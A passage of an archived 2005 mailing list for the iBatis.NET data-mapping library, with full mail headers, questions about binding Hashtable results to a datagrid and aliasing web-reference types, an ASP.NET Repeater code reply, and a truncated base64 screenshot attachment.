face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial'>Thank you</span></font></p> <p style=3D'margin-left:36.0pt'><font size=3D2 face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial'>&nbsp;</span></font></p> <p style=3D'margin-left:36.0pt'><font size=3D2 face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial'>Regards,</span></font></p> <p style=3D'margin-left:36.0pt'><font size=3D3 face=3D"Times New = Roman"><span style=3D'font-size:12.0pt'>&nbsp;</span></font></p> <p style=3D'margin-left:36.0pt'><font size=3D3 face=3D"Times New = Roman"><span style=3D'font-size:12.0pt'>Wiryadi Adidharma</span></font></p> </div> </div> <p class=3DMsoNormal style=3D'margin-left:36.0pt'><font size=3D3 face=3D"Times New Roman"><span style=3D'font-size:12.0pt'><br> <br clear=3Dall> <br> -- <br> Mario Chavez<br> <a href=3D"mailto:[email protected]">[email protected]</a><br> <a = href=3D"http://mario-chavez.decisionesinteligentes.com/">http://mario-cha= vez.decisionesinteligentes.com/ </a></span></font></p> </div> </body> </html> =00 ------_=_NextPart_001_01C6067D.6B113A3E-- From [email protected] Thu Dec 22 17:42:42 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 64543 invoked from network); 22 Dec 2005 17:42:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Dec 2005 17:42:42 -0000 Received: (qmail 71238 invoked by uid 500); 22 Dec 2005 17:42:41 -0000 Delivered-To: [email protected] Received: (qmail 71219 invoked by uid 500); 22 Dec 2005 17:42:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 71208 invoked by uid 99); 22 Dec 2005 17:42:40 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Dec 2005 09:42:40 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO web60713.mail.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 22 Dec 2005 09:42:39 -0800 Received: (qmail 61194 invoked by uid 60001); 22 Dec 2005 17:42:17 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=rocketmail.com; h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=B2Mol06ZCADf4s9Tl3RC9zfdiYJPJltqIVkjn3KNRoxFKn9+rXtLxf/Mlqq66Ux9JpMBXqyVv+lmPR+fHE1ILqtOcXm3wBKNPsrLW4CfxtFZ1czysEVShm9CHEbNQm+m9Mpt4RrtzICUqUayvNTbJLgwSKexd1sSRQjSR2wlaTk= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web60713.mail.yahoo.com via HTTP; Thu, 22 Dec 2005 09:42:17 PST Date: Thu, 22 Dec 2005 09:42:17 -0800 (PST) From: Bjorn I <[email protected]> Subject: Binding datagrid to ArrayList of Hashtables To: [email protected] MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N For most of my data I have created valueobjects to hold the data, and use that for the resultClass in my select statements. Now my application needs reports, and they might change over time. I did not want to create a valueobject for each report, so I was trying to return a IList of hashtable objects, and bind it to a datagrid. I set the returnClass to Hashtable, and call QueryByList. This returns the correct list, and I am able to bind it to the grid, but it says it can't find my columns. Does anybody have any examples of binding lists like this. The dev guide, 3.5.8, shows the mapped statement, but not how to access the items. B __________________________________ Yahoo! for Good - Make a difference this year. http://brand.yahoo.com/cybergivingweek2005/ From [email protected] Fri Dec 23 06:15:09 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 44820 invoked from network); 23 Dec 2005 06:15:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Dec 2005 06:15:09 -0000 Received: (qmail 79422 invoked by uid 500); 23 Dec 2005 06:15:09 -0000 Delivered-To: [email protected] Received: (qmail 79409 invoked by uid 500); 23 Dec 2005 06:15:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 79398 invoked by uid 99); 23 Dec 2005 06:15:08 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Dec 2005 22:15:08 -0800 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO web32209.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 22 Dec 2005 22:15:07 -0800 Received: (qmail 21817 invoked by uid 60001); 23 Dec 2005 06:14:46 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=2JkBfAiNsxIcZ6p53yRsbqQoAXIBzAaL7flKN3o1le3lWG9W0WXYxCVNM3hEqxxFdDkypuMkC3OgPRzzIElasrWBwSU/o5GxR56BBUAq2uH7oUp9pgf88w0p/CJHxlIRubIRQbxq/wL1Fy9rD+a12uceX2N0apPmn8TGXKU2M5A= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web32209.mail.mud.yahoo.com via HTTP; Thu, 22 Dec 2005 22:14:46 PST Date: Thu, 22 Dec 2005 22:14:46 -0800 (PST) From: Ron Grabowski <[email protected]> Subject: Re: Binding datagrid to ArrayList of Hashtables To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N <asp:Repeater runat="server" id="repList"> <ItemTemplate> <asp:Literal id="litItem" runat="server" /> </ItemTemplate> </asp:Repeater> private void repList_ItemDataBound(object sender, RepeaterItemEventArgs e) { if (e.Item.ItemType == ListItemType.Item) { IDictionary dict = (IDictionary)e.Item.DataItem; Literal litItem = (Literal)e.Item.FindControl("litItem"); foreach (DictionaryEntry entry in dict) { litItem.Text = String.Format("Key: [{0}], Value: [{1}]<br />", entry.Key, // 0 entry.Value); // 1 } } } --- Bjorn I <[email protected]> wrote: > For most of my data I have created valueobjects to > hold the data, and use that for the resultClass in my > select statements. > > Now my application needs reports, and they might > change over time. I did not want to create a > valueobject for each report, so I was trying to return > a IList of hashtable objects, and bind it to a > datagrid. I set the returnClass to Hashtable, and call > QueryByList. This returns the correct list, and I am > able to bind it to the grid, but it says it can't find > my columns. Does anybody have any examples of binding > lists like this. The dev guide, 3.5.8, shows the > mapped statement, but not how to access the items. > > B > > > > > __________________________________ > Yahoo! for Good - Make a difference this year. > http://brand.yahoo.com/cybergivingweek2005/ > From [email protected] Mon Dec 26 09:29:29 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9877 invoked from network); 26 Dec 2005 09:29:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Dec 2005 09:29:28 -0000 Received: (qmail 41113 invoked by uid 500); 26 Dec 2005 09:29:28 -0000 Delivered-To: [email protected] Received: (qmail 40994 invoked by uid 500); 26 Dec 2005 09:29:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 40983 invoked by uid 99); 26 Dec 2005 09:29:27 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 26 Dec 2005 01:29:27 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE,SPF_HELO_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO rly24d.srv.mailcontrol.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 26 Dec 2005 01:29:26 -0800 Received: from LYON-EXCHANGE2.sword.fr ([161.129.204.104]) by rly24d.srv.mailcontrol.com (MailControl) with ESMTP id jBQ9Swls025922 for <[email protected]>; Mon, 26 Dec 2005 09:28:58 GMT Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C609FE.AAE675A6" Subject: iBatis and WebReferences X-MimeOLE: Produced By Microsoft Exchange V6.5 Date: Mon, 26 Dec 2005 10:27:57 +0100 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: iBatis and WebReferences thread-index: AcYJ/qhNZbAdmMV8SAyM3MckSaMG/A== From: "SIX Douglas" <[email protected]> To: <[email protected]> X-Scanned-By: MailControl A-05-40-01 (www.mailcontrol.com) on 161.129.204.104 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N This is a multi-part message in MIME format. ------_=_NextPart_001_01C609FE.AAE675A6 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi, I'm creating a command line program in c# that calls a WebReference to get = =3D informations. The WebReference contains the definition of the DataObjets in= =3D the WSDL. Is it possible to use this DO definition in the datamap file ? Example: - a project that calls : WRProjet - contains the Web Refence : WSreference - in the Web Reference I have the definition for the data object : DOObject I've tried to use this code in a datamap file : <alias> <typeAlias alias=3D"DOObject" type=3D"WRProject.WSReference.DOObject" /> </alias> But it doesn't work. The framework complains about not finding the object. I've tried to copy locally the DO and using filling the datamap like this : <alias> <typeAlias alias=3D"DOObject" type=3D"WRProject.DO.DOObject" /> </alias> Of course it works fine, but don't think it's nice. Does anyone have suggestion ? Thank you and sorry for my english mistakes. =20 ___________________________=20 Douglas SIX SWORD Nord 03 20 65 30 50=20 This message has been scanned for viruses by BlackSpider MailControl - www.= blackspider.com ------_=_NextPart_001_01C609FE.AAE675A6 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML DIR=3Dl= tr><HEAD><META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; charset=3D= iso-8859-1"></HEAD><BODY> <DIV id=3DidOWAReplyText88042 dir=3Dltr> <DIV dir=3Dltr><FONT face=3DArial color=3D#000000 size=3D2>Hi,<BR><BR>I'm c= reating a=20 command line program in c# that calls a WebReference to get =3D<BR>informat= ions.=20 The WebReference contains the definition of the DataObjets in=3D<BR>&nbsp;t= he=20 WSDL. Is it possible to use this DO definition in the datamap file=20 ?<BR><BR>Example:<BR><BR>- a project that calls : WRProjet<BR>- contains th= e Web=20 Refence : WSreference<BR>- in the Web Reference I have the definition for t= he=20 data object : DOObject<BR><BR>I've tried to use this code in a datamap file= =20 :<BR>&lt;alias&gt;<BR>&lt;typeAlias alias=3D"DOObject"=20 type=3D"WRProject.WSReference.DOObject" /&gt;<BR>&lt;/alias&gt;<BR><BR>But = it=20 doesn't work. The framework complains about not finding the object.<BR>I've= =20 tried to copy locally the DO and using filling the datamap like this=20 :<BR><BR>&lt;alias&gt;<BR>&lt;typeAlias alias=3D"DOObject"=20 type=3D"WRProject.DO.DOObject" /&gt;<BR>&lt;/alias&gt;<BR><BR>Of course it = works=20 fine, but don't think it's nice.<BR><BR>Does anyone have suggestion=20 ?<BR><BR>Thank you and sorry for my english mistakes.</FONT></DIV> <DIV dir=3Dltr><FONT face=3DArial color=3D#000000 size=3D2></FONT>&nbsp;</D= IV></DIV> <DIV id=3DidSignature49124 dir=3Dltr> <DIV RE><FONT color=3D#000080><FONT=20 face=3DArial>___________________________</FONT></FONT> <DIV RE><PRE></PRE> <DIV RE><FONT color=3D#000080><FONT face=3DArial size=3D2>Douglas SIX<BR>SW= ORD=20 Nord</FONT><BR><FONT face=3DArial size=3D2>03 20 65 30 50</FONT></FONT> <DIV RE><PRE></PRE></DIV></DIV></DIV></DIV></DIV><br><br> <P align=3Dcenter><FONT style=3D"BACKGROUND-COLOR: #ffffff">This message ha= s been scanned for viruses by </FONT><A href=3D"http://www.blackspider.com/= "><FONT style=3D"BACKGROUND-COLOR: #ffffff" color=3D#000000>BlackSpider Mai= lControl</FONT></A></P> </body></HTML> ------_=_NextPart_001_01C609FE.AAE675A6-- From [email protected] Wed Dec 28 05:24:07 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 68483 invoked from network); 28 Dec 2005 05:24:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Dec 2005 05:24:07 -0000 Received: (qmail 44327 invoked by uid 500); 28 Dec 2005 05:24:06 -0000 Delivered-To: [email protected] Received: (qmail 44313 invoked by uid 500); 28 Dec 2005 05:24:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 44302 invoked by uid 99); 28 Dec 2005 05:24:05 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 27 Dec 2005 21:24:05 -0800 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE,HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO web33811.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 27 Dec 2005 21:24:04 -0800 Received: (qmail 56672 invoked by uid 60001); 28 Dec 2005 05:23:43 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=Jslg2qGWcERdMb5sjKui7QNq0pi9ISAqPz5Qr1Opg9rUZjaEDXxoikVxENr3qVVIsZKxM2cZprUFwObOlA2HZJXTbluV3qE+sHKqSM1q6Wl0fisu0tbvw1TDjYuJ0hMDuGGogicRa13h6qe68/dbT5eUhk5yQtZXZWWS2Mb8OAU= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web33811.mail.mud.yahoo.com via HTTP; Tue, 27 Dec 2005 21:23:43 PST Date: Tue, 27 Dec 2005 21:23:43 -0800 (PST) From: Iwan Santoso <[email protected]> Subject: problem To: [email protected] MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="0-386431060-1135747423=:56658" Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N --0-386431060-1135747423=:56658 Content-Type: multipart/alternative; boundary="0-440256894-1135747423=:56658" --0-440256894-1135747423=:56658 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Hi, I'm a newbie. I have a problem when I try to do inserting. Could anybody help me. Thanks. -iwan- --------------------------------- Yahoo! DSL Something to write home about. Just $16.99/mo. or less --0-440256894-1135747423=:56658 Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: 8bit <div id="RTEContent">Hi,<br> <br> I'm a newbie. I have a problem when I try to do inserting. Could anybody help me. Thanks.<br> <br> -iwan-<br> </div><p> <hr size=1> <a href="http://pa.yahoo.com/*http://us.rd.yahoo.com/evt=37474/*http://promo.yahoo.com/broadband/ ">Yahoo! DSL</a> Something to write home about. Just $16.99/mo. or less --0-440256894-1135747423=:56658-- --0-386431060-1135747423=:56658 Content-Type: image/jpeg; name="ERROR.JPG" Content-Transfer-Encoding: base64 Content-Description: 2400305299-ERROR.JPG Content-Disposition: inline; filename="ERROR.JPG" /9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsL DBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/ 2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCADEAbwDASIAAhEBAxEB/8QA HwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUF BAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkK FhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1 dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXG x8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEB AQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAEC AxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRom JygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOE hYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU 1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDL8R+NLvxV qk08kjtp4k/0a1bhEUZ2krkgvgnJ56kA4wKoxXMSj/j0tyfeMVj6RA8whijX c8hCqOmSeBXotx4CaHX9dso/Pe3sLJrmB9ygyttyik9OSGHb7p6V+gOdDCxV N6K35WX6ny1SlVrVG466nLm/jA/49Lb/AL9CmHUov+fO2/79CtJ/C13c2ejC wsriW6vo5pSxmiaJlQryuGyuAwDb8YJxVSLwnrNxfmzhtY5Jhbfa/kuIyphy BvDbtpHI6GtFXoO/vLr17Oxl9XqdmV/7Si/587b/AL9Cj+0ov+fO2/79CrEH hDXbm3mnhsC8cLyRkrImWZPvhBnL4wfu56UyXwrrUOnQ372LfZ5hG0ZV1ZmD nCHYDu5PTin7ahe3MvvD2FTsyL+0ov8Anztv+/Qo/tKL/nztv+/Qq+vgnWY9 VsLK9gW1W8uBAJjKjKjcZBIbAbHIUkE9BzVvU/CVskfiS6sblYrbRJEhYT3c MjTMWwxJUqI+MYU5JOV+9lRnLF4dNLmWv+dvzLWFqtN2en/DmL/aUX/Pnbf9 +hR/aUX/AD523/foVd0XStNn8O61q+opdSDT2tlSK3lWPd5shQ5JVunBqzqH gm9/tbyNHBvLSS0jvopXKxbYZM7d5YgBsgjrzjOOwbxNGM3CWlu+2ye/zQlh puKktbmT/aUX/Pnbf9+hR/aUX/Pnbf8AfoVK3hXW0jnd9PdRBcrayAsuVkbG 0YznByMHoc9asv4G8SIs5bTG/cllYCVCWIG4hQGy+B/dz3HUVbr0FvJfeiVQ qPo/xKP9pRf8+dt/36FH9pRf8+dt/wB+hWk3hSW60jw9LpkU1xe6kl1JKhZQ kawuq5ycbRhuST6VT/4RXWft9xZNaKk1vbm6kMk0aosIxl95baV5HIPr6GlH EUHf3krX/B2/Mbw9RW0ev6kP9pRf8+dt/wB+hR/aUX/Pnbf9+hVxfBXiFri5 g/s/a9sqNKXmjVQrglTuLYIO08g44xTbzwb4gsYJJrjTmCxusbqkiOysxwoK qSeT045p+3w7duZX9UL6vUtez/Eq/wBpRf8APnbf9+hR/aUX/Pnbf9+hVi88 Ia7YT2sNxYFXuphBFiVGBkOMKSCQp5HBxVlPA+tLqFjbXkMdsl1ci2ExnjZU fuDhvvAZ+XgnoOTSeIw9r8y+8f1epe1mZ39pRf8APnbf9+hR/aUX/Pnbf9+h UGraf/ZWs3unedHMbWdoS6MpBwfYnB9RnI6HkVv+K/C6aT4kXRNN0zUCZJki t7u6uF2XJZVJCDy1HDOFJ3kDBz7Dr0k4r+ZXXorf5gsPNqT7GP8A2nF/z523 /foUf2nF/wA+dt/36FXX8EeIY54IWsF8yeUwxgXEZBkALFSQ2AcA8HFWND8G ahe3lu15Yzmzkllh2wXEKTO6A5VBIwyQRz7A+lKWJw8YuXMreq/roNYao3az /Eyv7Ti/587b/v0KP7Ti/wCfO2/79Clj8OatJolvq62gNlcHETrKhLneEwq5 3E7iBwKmvPCOuWFxawXFiVe6mEEWJUYGQ4wpIJCnkcHFX7aje3Mvv7b/AHdS fYT3syD+04v+fO2/79Cj+04v+fO2/wC/Qq6/gfxEk8MJ07Mk0jRIEnjb51Us VOG4ICk4PpT/APhA/EmQBp6tuBK7bmI78Zztw3zEYOQMkVP1nD/zr70P6vV/ lf4mf/acX/Pnbf8AfoUf2nF/z523/foVJ/wi2tf2R/av2B/sZj83duXdszjf szu2++MY56VK/g/XU03+0Gsh9m+zi63CeMt5RGQ+3duxj2qvbUP5l2369hew n2ZW/tOL/nztv+/Qo/tOL/nztv8Av0Km8ReHn8PPpySXUE7Xlml1iN0OzOcj hjkdMN0POM4NY2KqnKFSPNDVEzpuD5Zbmn/acX/Pnbf9+hR/acX/AD523/fo VmYoxV8qJ5TT/tOL/nztv+/Qo/tOL/nztv8Av0KzMUYo5UHKaf8AacX/AD52 3/foUn9pxf8APpbf9+hWbijFHKg5TS/tKL/n0tf+/Qo/tKL/AJ9LX/v0KzMU Yo5V2DlNP+0ov+fS1/79Cj+0ov8An0tf+/QrMxRijlXYOU0/7Si/59LX/v0K P7Si/wCfS1/79CszFGKOVdg5TT/tKL/n0tf+/Qo/tKL/AJ9LX/v0KzMUYo5V 2DlNP+0ov+fS1/79Cj+0ov8An0tf+/QrMxRijlXYOU0/7Si/59LX/v0KP7Si /wCfS1/79CszFGKOVdg5TT/tKL/n0tf+/Qo/tKL/AJ9LX/v0KzMUYo5V2DlN P+0ov+fS1/79Cj+04v8An0tv+/QrMxTWBFPlQ+U0H1SPtaW34xCom1WMjmzt f+/QrPaomBo5TSMEaB1kRSJJFDHFIjBkkiXYysDkEEcgj1r0Lwx8cLLTNHWz 8RR391dxMVjmgRGLR4GN5ZwS2cjOOQBkk5NeUMtYl6pE/TtXDmGGp1qaVRXP QwXuSfKztfDM8Vnf6fdzBjDDPHI4QclQwJx05wK9Ht/iHA08Ms1neDddXT3D Kse+S3Jm8iL72MjzQeuBt61x/hfwNrGvaT9qsriySNH8siZ3BztVuyn+8K31 +GHiRR/x96X/AN/JP/iK58dVy+rU5a07NaEUo4uF5Uo6PUisfEtpHo+maXdW l35S6XfWV5JHsyv2h0YGPJ5I2nOcDnqazrPUNL0mLWksrbUHS90eaxTzVjDt M4A3EBsKnHqT9a1/+FZeJP8An60v/v7J/wDEUh+GPiQ/8vWl/wDf2T/4islX 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 